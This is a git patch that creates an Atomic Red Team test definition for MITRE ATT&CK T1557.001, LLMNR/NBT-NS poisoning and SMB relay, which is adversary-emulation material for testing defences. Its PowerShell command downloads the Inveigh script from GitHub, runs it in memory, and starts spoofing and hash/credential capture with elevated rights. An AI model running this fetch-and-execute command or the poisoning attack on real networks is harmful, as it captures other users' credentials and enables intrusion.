From 4e55b364f73093eac396e17de8202bfeda2e180a Mon Sep 17 00:00:00 2001
From: Scot Pfeffer <45760923+scotp71@users.noreply.github.com>
Date: Wed, 26 Jan 2022 15:13:20 -0500
Subject: [PATCH] Create T1557.001 yaml (#1743)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1557.001/T1557.001.yaml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
 create mode 100644 atomics/T1557.001/T1557.001.yaml

diff --git a/atomics/T1557.001/T1557.001.yaml b/atomics/T1557.001/T1557.001.yaml
new file mode 100644
index 00000000..06e28b69
--- /dev/null
+++ b/atomics/T1557.001/T1557.001.yaml
@@ -0,0 +1,14 @@
+attack_technique: T1557.001
+display_name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
+atomic_tests:
+- name: LLMNR Poisoning with Inveigh (PowerShell)
+  description: 'Inveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. This Atomic will run continuously until you cancel it or it times out.'
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/82be2377ade47a4e325217b4144878a59595e750/Inveigh.ps1" -UseBasicParsing)
+      Invoke-Inveigh -ConsoleOutput Y -NBNS Y -MDNS Y -HTTPS Y -PROXY Y
+    name: powershell
+    elevation_required: true